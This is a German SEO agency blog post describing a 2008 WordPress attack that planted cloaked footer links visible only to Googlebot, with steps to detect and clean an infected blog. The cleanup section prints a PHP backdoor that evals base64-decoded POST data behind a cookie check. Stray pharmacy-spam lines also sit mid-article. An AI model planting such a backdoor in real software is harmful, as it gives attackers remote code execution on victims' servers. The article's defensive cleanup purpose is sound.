WordPress Cloaking Exploit – Hidden Footer Links

80.000 deutschsprachige Blogs mit einem WordPress Hidden Footer Links Exploit infiziert.

Das WordPress nicht unbedingt zu den sichersten Content Management Systemen der Welt gehört, sollte mittlerweile bis in die letzten Ecken der Blogosphäre vorgedrungen sein.
Horrormeldungen von gehackten Blogs und infiltrierter Malware machen alltäglich die Runde und die Hilfeschreie nach einer einigermaßen sicheren und stabilen Version werden mit jedem neuen Release immer lauter.

Aber was ist heute noch sicher? Ein Grund warum position worx dieses Thema aufgreift ist die hohe Anzahl der neuerlich infizierten Blogs und die Hinterlistigkeit, wie dieser Angreifer sich andere Blogs zu nutzen macht. Der Schaden für jeden privaten Blog, sowie auch jeden Corporate Blog ist immens, denn meist ist ein Blog Bestandteil einer ganzen Präsenz. Ein Delisting aus dem Google Index, und sei es “nur mit einem Blog”, zieht selbstverständlich auch die Toplevel Domain mit ins Schlamassel.
Folglich kann ein gezielter Angriff, von dem Sie selber nicht viel merken werden, Ihr Online Business von heute auf morgen auslöschen. Ein neuerlicher Hack macht die Tage die Runde, der eben so hart zuschlägt wie beschrieben. Nennen wir ihn Hidden Footer Links WordPress Exploit.

Die Story:
2 Wochen vor Weihnachten bemerkte ich einen hohen Traffic und Umsatzeinbruch auf rund 20 meiner Affiliate Blogs. Erklärungen waren hierfür schnell gefunden. Rezession und das bevorstehende Weihnachtsfest wurden von mir als Übeltäter ausgemacht, denn gerade die Affiliate Szene ist üblicherweise sehr stark abhängig von saisonalen und wirtschaftlichen Veränderungen und Ereignissen. In 2008 verzeichneten mehrere Partner rund 50% Gewinneinbußen und dies ging wie ein Querschnitt durch die ganze Affiliate Szene durch alle erdenklichen Nischen. Also war es kein Wunder, dass ich irgendwann auch an der Reihe war. Hinzu kamen die üblichen Gerüchte, dass Google mal wieder an der Stellschraube dreht. Also hieß es für mich abwarten und beobachten, denn nach einem Bergab, kam üblicherweise immer ein Bergauf. Eine Laune des Internets eben.
10 Tage nach dem unerklärlichen Einbruch wurde ich von einem potentiellen Reciprocal Link Exchange Partner angeschrieben, dass ich doch einmal meinen Blog anschauen sollte, denn mit dieser Masse an Outgoing Links sei er nicht gewillt einen Link zu mir zu setzen. So genannte Reciprocal Link Checker testen in diversen Zyklen, Linkpartner und die, die es werden wollen auf Bad Neighborhood und zu vieleln Out-links – ein Tool, welches qualifiziert und überwacht. Verdutzt nahm ich mein Blog genauer unter die Lupe, fand jedoch weder im Quellcode noch auf der Page irgendeinen Anhaltspunkt.
Nach einem genauen Blick in die Database stellte ich fest, dass diese zwar Recht groß geworden ist. Jedoch war ich nie einer von den Spezies, die bei solchen Anhaltspunkten direkt ein Verbrechen wittern. Also ließ ich Weihnachten verstreichen und kümmerte mich lieber um die üblichen Festivitäten.

Am zweiten Januar dann der Supergau. 20 High Traffic Blogs mit einem täglichen Traffic-Volumen von 20k verschwanden von einem Tag auf den anderen komplett aus dem Google Index. Schnell machte ich mich auf die Fehlersuche und fand noch einige Serps Schnipsel von noch nicht vom Index genommenen Unterseiten meiner Blogs.

Google zeigte mir eine Webseiten-Größe von über 180k an, was einer Ebay-Seite mit 50 Produkten gleich kommt, jedoch nicht einer Blog-Page mit einem Bild und gerade mal 100 Worten.

Auf der Page fand ich immer noch keinen direkten Hinweis auf den Übeltäter. Durch einen dummen Zufall klickte ich dann zufällig auf die Cache Version die Google bereitstellt, also die Version der Seite wie der Googlebot sie nur sehen kann. Im Footer meiner Page fand ich rund 800 versteckte Cloaking Footer Links, also für Besucher und Besitzer nicht sichtbar auf der Page aufgerufene Links zu anderen Webseiten.
Diese ruft der Angreifer mit einer relativ einfachen IF Abfrage auf. IF GoogleBot than … show him Links, IF Someone Else than show …. nothing:) die er mir in den Footer bzw. Header geschrieben hatte.

Hidden Footer Links

Wie der Angreifer diese Schwachstelle finden konnte, war mir unerklärlich, besonders wie der Cloaking Link in meinen Footer gekommen ist. Wenn es mit einer Blog Installation mal schnell gehen muss, vergesse ich gerne mal den Chmod von 777 auf 664 zurückzusetzen. Aber auf 20 verschiedenen Blogs war diese Erklärung doch recht unwahrscheinlich.
Cloaking,  um den Begriff hier kurz zu erklären: ist eine Technik, Google auf einer Webseite etwas andereszu präsentieren als wirklich vorhanden ist, mit dem Hintergrund die Webseite dadurch im Suchmaschinenindex besser zu positionieren. (Lesen Sie hier mehr zu den Folgen von Cloaking)
Als Schwachstelle stellte sich ein User der sich als WordPress tarnt heraus – jedoch nicht von WordPress bei der Installation als Default eingerichtet wird. D.h. über die Schnittstelle „Einen User anlegen“
gelangte der Feind in mein CMS und somit auch auf meine Database und Server.
Das fatale und gleichzeitig für mich glückliche daran ist die Tatsache, dass dieser Angriff via eines Bots, also automatisch und nicht per Hand erfolgte. Nicht auszumahlen wenn der Angreifer direkten manuellen Zugriff auf meinen Server gehabt hätte. Das fatale daran ist, dass der Angreifer anscheinend einen recht einfachen Weg gefunden hat, mit einem Bot das Internet nach älteren WordPress Versionen zu abzusuchen und zu hacken. Bei welcher Version es genau zu dieser Sicherheitslücke führen konnte, ist für uns schwer zu sagen, jedoch wurden zwei Blogs mit der vorletzten WordPress Version 2.06 gehackt, so dass man darauf schließen kann, dass alle Versionen unter dieser Versionsnummer von diesem Problem betroffen sind.
Hintergrund dieses Angriffes, der in der abgeschwächten Version schon Al Gore zum Opfer gefallen ist, kostenlos und hinterlistig an One Way Backlinks zu kommen. Wie allen bekannt sein sollte, sind Links die auf eine Webseite ausgerichtet sind ausschlaggebend für das Ranking im Suchmaschinenindex. Das Empfehlungsprinzip auf dem Google sein Ranking aufbaut. So erschleicht sich der Angreifer eine sechs bis siebenstellige Anzahl von One Way Backlinks.

Insgesamt wurden Deutschlandweit nach meinen Recherchen und den Anchor und Keyword Texten mit denen der Angreifer meines Wissens arbeitet, rund 100.000 Webpages infiziert.

Buy Adipex

Purchase Phentermine Mexico Cheap Phentermine Diet Pills

Sollte der Hacker auch nur zehn unterschiedliche Anchor Texte benutzen, erhöht sich die Anzahl der deutschsprachigen infizierten Blog Pages auf über 1 Million.
Deutschsprachig und alle englischsprachigen Webseiten zusammengefasst, kommt man nach kurzen Recherchen auf rund 3 Millionen gehackte Pages. Alleine die laufenden Traffickosten der Opfer die bisher noch nichts von ihrem Glück wissen, kann man auf rund 10 Millionen Euro monatlich Weltweit beziffern. Denn die Webseiten werden durch die Backlinks exorbitant groß und geht zu Lasten des Traffic Limits.

Page Size

Und das ist wahrscheinlich nur die Spitze des Eisbergs, denn hierbei handelt es sich um Webseiten,
die von Google noch nicht wegen des Spam Verdachts vom Index genommen wurden.
Denken wir daran, dieser Hack existiert seit März 2008 und wurde Anfang Dezember in einer agressiveren Form neu aufgelegt.

Wie kann ich prüfen ob ich betroffen bin?

Die Sache ist relativ einfach. Testen Sie Ihr Blog mit dem Befehl site:meineseite.de/blog/ in der Google Suche.
Klickt man in den Suchergebnissen auf Cache Version und nicht auf die Website, zeigt Google die Cache Version, so wie der GoogleBot diese sieht an. Mit Rechtsklick auf “Quelltext Anzeigen”, können Sie dann Ihren Quelltext auf verdächtiges Untersuchen.

Sind Sie nicht betroffen, überprüfen Sie Ihre Version mit dem letzte Release auf WordPress.org.
Mit einem Spider Simulator haben Sie auch eine Möglichkeit Ihre Webseite live zu prüfen.

Ich bin betroffen, was nun?

  • Führen Sie als aller erstes ein Update Ihrer WordPress Version durch.
  • Sollten Sie einen direkten Zugang zu Ihrer Database haben (myphpadmin), öffnen Sie hier den Tab “WP_Users” und löschen Sie den User “WordPress“. Ändern Sie auch ggF. alle Passwörter Ihrer Administratoren und Moderatoren, inklusive Ihrer Zugangsdaten.
  • Sollten Sie einen FTP Zugang haben, testen Sie alle Pfade nach Daten, an denen Sie wissen ganz bestimmt keine Änderung vorgenommen zu haben.
    In meinem Fall hab ich veränderte Daten im Blog Root, Uploads, WP_Content und WP_Admin gefunden.
    Der Cloaking Link sollte so, oder so ähnlich aussehen.<?php if(md5($_COOKIE['_wp_debugger'])==”2435265e6253721e9a8e200d1ebbc54e”){ eval(base64_decode($_POST['file'])); exit; } ?>

    und befindet sich entweder im Index, Footer oder Header Ihres Themes in dem Pfad: wp-content/themes/mytheme. Auf jeden Fall enthält der Cloaking Link den Begriff “base64″. Untersuchen Sie zusätzlich Ihre Plugins auf Änderungen die Sie nicht vorgenommen haben. Rechts neben den Dateinen finden Sie meist ein Datum, welches Rückschlüsse auf etwaige Änderungen zulässt.

Ihr Blog ist nun gesäubert. Sollte Ihr Problem differenzierter sein als hier beschrieben, gibt es hier diverse andere Lösungswege das Problem anzugehen.

Sven Hendrik Schürmann COO, SEO Specialist position worx.

Dieser Beitrag wurde unter Suchmaschinen-Optimierung abgelegt und mit , , , verschlagwortet. Setze ein Lesezeichen auf den Permalink.

Hinterlasse eine Antwort

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *

*

Du kannst folgende HTML-Tags benutzen: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>